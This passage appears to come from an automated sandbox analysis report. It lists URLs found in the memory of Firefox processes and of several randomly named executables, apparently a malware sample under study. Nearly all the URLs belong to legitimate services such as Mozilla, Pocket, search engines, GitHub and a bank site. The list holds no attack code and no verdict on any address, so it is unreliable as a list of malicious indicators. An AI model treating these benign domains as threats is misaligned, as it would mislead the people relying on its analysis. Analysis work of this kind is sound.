Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2978589406.000001DEDEB30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/993268
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://datastudio.google.com/embed/reporting/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationschr
Source: firefox.exe, 0000001C.00000003.2933112137.000001DEF03B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2779540484.000001DEF03BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933815847.000001DEF0379000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755426525.000001DEF693A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E713000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000003.2760314917.000001DEEFF91000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2761194812.000001DEEFF92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1BrowserInitState.startupIdleTaskPromise
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3012755816.000001DEEAC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E713000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E82F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E730000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001C.00000003.2757888538.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2758502866.000001DEF6A31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2828014808.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2825634807.000001DEF6A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000001C.00000003.2757888538.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2758502866.000001DEF6A31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2828014808.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2825634807.000001DEF6A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001C.00000003.2720133791.000001DEEC120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotsshims/private-browsing-web-api-fixes.jsaboutConfigPip
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881.browser
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp, 98a7b9f337.exe, 00000022.00000002.2946404134.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ipbefore
Source: firefox.exe, 0000001C.00000003.2933112137.000001DEF03A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D91000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
